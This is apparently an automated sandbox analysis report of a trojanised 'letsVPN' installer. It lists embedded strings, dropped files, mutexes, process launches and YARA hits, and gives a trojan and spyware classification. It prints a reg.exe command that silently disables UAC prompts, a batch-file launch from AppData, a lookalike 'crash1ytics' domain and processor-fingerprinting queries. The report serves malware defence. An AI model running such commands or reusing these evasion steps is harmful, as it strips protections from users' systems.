              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263010-windows-%E5%A6%82%E4%BD%95%E6%B8%85%E7%90%86
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windows
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263093-%D0%BA%D0%B0%D0%BA-%D1%83%D0%B4%D0%B0%D0%BB%
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1628560-help-documents
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/Killer
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://letsvpn.world/privacy.html
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://letsvpn.world/registerterm.html
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://letsvpn.world/terms.html
              Source: LetsPRO.exe, 00000038.00000002.3930288330.000000000F29A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/device
              Source: LetsPRO.exe, 00000038.00000002.3925778134.000000000F086000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/deviceError
              Source: LetsPRO.exe, 00000038.00000002.3925778134.000000000F086000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicechecking
              Source: LetsPRO.exe, 00000038.00000002.3925778134.000000000F086000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/device
              Source: powershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://pngimg.com/uploads/light/light_PNG14440.png
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://widget.intercom.io/widget/
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: LetsPRO.exe, 00000038.00000002.3942255684.00000000389B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/mp/collect?measurement_id=G-G4T2PRPBD9&api_secret=g51
              Source: LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00405705
              Source: C:\Windows\System32\mmc.exe Window created: window name: CLIPBRDWNDCLASS
              Source: Yara match File source: 56.2.LetsPRO.exe.682d0000.21.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: letsvpn-latest.exe PID: 8108, type: MEMORYSTR
              Source: Yara match File source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, type: DROPPED
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.cat (copy)
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.cat (copy)
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.cat
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC4B.tmp
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAD4.tmp
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00381660: CreateFileW,DeviceIoControl,CloseHandle,17_2_00381660
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,19_2_0040351C
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}
              Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\drvstore.tmp
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\inf\oem4.inf
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\SETC543.tmp
              Source: C:\Windows\System32\drvinst.exe File deleted: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC3A.tmp
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess token adjusted: Load Driver
              Source: C:\Windows\System32\svchost.exeProcess token adjusted: Security
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C55ED7E appears 138 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C55EDFC appears 69 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C55F750 appears 33 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C564B60 appears 37 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C5649A4 appears 65 times
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: String function: 00858C30 appears 40 times
              Source: System.Globalization.Extensions.dll.19.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: s.0.drStatic PE information: No import functions for PE file found
              Source: s.0.drStatic PE information: Data appended to the last section found
              Source: letsVPN.exe, 00000000.00000002.2213961398.0000000000681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: letsVPN.exe, 00000000.00000003.2211380442.0000000000681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileStream.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileStream.SetAccessControl
              Source: System.IO.Pipes.AccessControl.dll.19.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.SetAccessControl(System.IO.Pipes.PipeSecurity)
              Source: System.IO.Pipes.AccessControl.dll.19.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.GetAccessControl()
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ".xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;" +
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
              Source: classification engineClassification label: mal62.spre.troj.spyw.evad.winEXE@103/292@9/12
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180003848 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,_beginthreadex,Sleep,SleepEx,CloseHandle,0_2_0000000180003848
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,19_2_0040351C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1C7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,InitiateSystemShutdownExW,28_2_00007FF7132A1C7C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CE060 _wfindnext32i64,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,_getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,memset,GetDiskFreeSpaceA,GetLastError,_errno,17_2_6C5CE060
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000310C CoInitialize,CoImpersonateClient,CoInitializeSecurity,CLSIDFromProgID,CoCreateInstance,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantClear,CoUninitialize,0_2_000000018000310C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A2C44 lstrcpyW,LoadLibraryW,FindResourceW,FindResourceExW,LoadResource,LockResource,lstrlenW,lstrcpyW,FreeLibrary,CreateEventW,CreateThread,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,28_2_00007FF7132A2C44
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\Users\user\AppData\Roaming\b6Jzu.bat
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
              Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeMutant created: \Sessions\1\BaseNamedObjects\V 4 I
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\C__Program Files (x86)_letsvpn_app-3.12.0_Log_
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Instance: ESENT Performance Data Schema Version 295
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
              Source: C:\Users\user\Desktop\letsVPN.exeMutant created: \Sessions\1\BaseNamedObjects\V? 5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nshFF05.tmp
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat"
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCommand line argument: main.cc17_2_00375F90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCommand line argument: Vll17_2_00375F90
              Source: letsVPN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
              Source: C:\Users\user\Desktop\letsVPN.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\letsVPN.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
